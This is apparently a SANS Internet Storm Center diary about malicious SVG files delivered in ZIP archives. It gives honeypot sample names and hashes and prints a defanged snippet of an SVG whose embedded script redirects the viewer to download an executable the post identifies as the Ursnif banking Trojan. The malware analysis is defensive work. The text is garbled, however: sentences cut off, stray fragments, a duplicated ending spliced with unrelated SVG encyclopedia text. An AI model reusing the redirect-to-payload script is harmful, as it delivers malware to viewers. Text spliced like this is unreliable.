Malicious SVG Files in the Wild, (Tue, Jan 24th)

In November 2016, the Facebook messenger application was used to deliver malicious SVG files to people [1]. SVG files (or Scalable Vector Graphics) are vector images that can be displayed in most modern browsers (natively or via a specific plugin). More precisely, Internet Explorer 9 supports the basic SVG feature sets and IE10 extended the support by adding SVG 1.1 support. In the Microsoft Windows operating system,SVG files are handled by Internet Explorer by default.

From a file format point of view, SVG files are XML-based and can be edited/viewed via your regular text editor. Amongst all the specifications of the SVG format, we can read this one in the W3C recommendations [2]:

Scripting
All aspects of an SVG document can be accessed and manipulated using scripts in a similar way to HTML. The default scripting language is ECMAScript (closely related to JavaScript) and there are defined Document Object Model (DOM) objects for every SVG element and attribute. Scripts are enclosed in

As you can see, attackers have all the requirements to build malicious SVG files. A few days ago, I captured two samples via my honeypot:

  • 00967999543-(02).svg (MD5:6b9649531f35c7de78735aa45d25d1a7)
  • P0039988439992_001.jpg.svg (MD5:e2f7245d016c52fc9c56531e483e6cfb)

Those two pictures belong”>
_?xml version=1.0 standalone=no?__!DOCTYPE svg PUBLIC -//W3C//DTD SVG 1.1//EN http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd__svg xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink version=1.1_ _image width=1000 height=900 xlink:href=base64, … … … /_ _script type=application/javascript_ … … …]] _/script__/svg_

(_ have been used to prevent the code to be interpreted by readers”>
setTimeout(function () { window.location.href = hxxp://juanpedroperez.com/fotos/photos/xfs_extension.exe

The PE fileis not available anymore at the location above but here is a link[3] to the sample (it was an Ursnif banking Trojan[4]). The malicious SVG file is of course delivered via a ZIP archive. At the moment, those two malicious files are detected by most of the antivirus but other waves may be launched. Keep an eye on this file format and another file extension to take care of.

[1]http://securityaffairs.co/wordpress/53650/malware/svg-images-locky.html
[2]https://www.w3.org/TR/SVG11/script.html
[3]https://www.virustotal.com/en/file/3af18232a9175dea624a7947e6edef6a57457bdf6d3ba0ead58856a139db2832/analysis/
[4]https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Ursnif

XavierMertens(@xme)
ISC Handler – Freelance Security Consultant
PGP Key plorer 8 and older versions do not support SVG.[60][61] IE9 (released 14 March 2011) supports the basic SVG feature set.[62] IE10 extended SVG support by adding SVG 1.1 filters.[63]

Scalable Vector Graphics (SVG) is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation. The SVG specification is an open standard developed by the World Wide Web Consortium (W3C) since 1999.

SVG images and their behaviors are defined in XML text files. This means that they can be searched, indexed, scripted, and compressed. As XML files, SVG images can be created and edited with any text editor, but are more often created with drawing software.

?

[1]?http://securityaffairs.co/wordpress/53650/malware/svg-images-locky.html
[2]?https://www.w3.org/TR/SVG11/script.html

Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.